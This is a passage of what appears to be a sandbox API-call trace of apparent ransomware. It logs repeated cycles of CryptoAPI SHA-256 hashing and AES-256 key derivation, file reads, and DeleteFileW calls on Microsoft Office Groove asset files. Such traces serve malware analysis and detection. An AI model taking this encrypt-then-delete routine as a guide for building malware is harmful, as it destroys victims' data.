dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.207] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.207] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.207] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.207] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x167bd [0166.207] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.213] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.213] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.213] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.215] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePage.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepage.gif")) returned 1 [0166.216] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.217] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.217] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.217] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.217] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4ebb [0166.217] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.254] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.254] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.254] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageBlank.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepageblank.gif")) returned 1 [0166.256] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.257] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.257] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.257] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.257] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x40f [0166.257] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.259] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.259] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.259] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.260] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_FormsHomePageSlice.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_formshomepageslice.gif")) returned 1 [0166.261] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.262] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.262] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.262] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.262] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5690 [0166.262] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.280] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.280] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.280] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_GreenTea.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_greentea.gif")) returned 1 [0166.283] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.283] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.283] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.283] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.283] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6a [0166.283] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x6a, lpOverlapped=0x0) returned 1 [0166.285] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.285] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.285] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.286] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Groove.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_groove.gif")) returned 1 [0166.288] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.288] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.288] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.288] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.288] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a6 [0166.288] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.292] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.292] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.292] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.293] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_LightSpirit.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_lightspirit.gif")) returned 1 [0166.294] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.295] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.295] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.295] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.295] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3d57 [0166.295] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.298] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.298] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.298] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.299] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_OliveGreen.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_olivegreen.gif")) returned 1 [0166.301] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.301] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.301] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.301] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.301] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1845 [0166.302] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.304] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.304] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.304] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.305] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Premium.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_premium.gif")) returned 1 [0166.307] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.307] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.307] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.307] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.307] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5141 [0166.307] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.311] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.311] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.311] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.312] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_slateblue.gif")) returned 1 [0166.313] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.314] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.314] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.314] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.314] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x193c [0166.314] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.326] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.326] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.326] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_texturedblue.gif")) returned 1 [0166.329] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.330] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.330] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.330] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.330] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c64 [0166.330] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.333] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.333] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.333] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.334] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_velvetrose.gif")) returned 1 [0166.335] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.336] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.336] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.336] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.336] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171 [0166.336] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.337] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.337] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.337] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.338] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_left.gif")) returned 1 [0166.339] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.340] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.340] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.340] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.340] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176 [0166.340] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.341] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.342] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.342] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.343] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_left_over.gif")) returned 1 [0166.344] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.344] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.344] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.344] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.344] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb5 [0166.344] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.346] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.346] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.346] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.347] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_mid.gif")) returned 1 [0166.349] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.349] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.349] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.349] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.349] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7 [0166.349] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.351] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.351] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.351] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.352] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_mid_over.gif")) returned 1 [0166.353] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.354] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.354] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.354] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.354] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x171 [0166.354] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.355] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.355] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.355] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_right.gif")) returned 1 [0166.358] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.358] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.358] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.358] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.358] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x244 [0166.358] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.378] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.378] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.378] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.380] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\button_right_over.gif")) returned 1 [0166.382] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.383] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.383] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.383] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.383] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x45d [0166.383] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.404] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.404] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.404] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.405] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsblankpage.html")) returned 1 [0166.407] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.407] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.407] CryptHashData 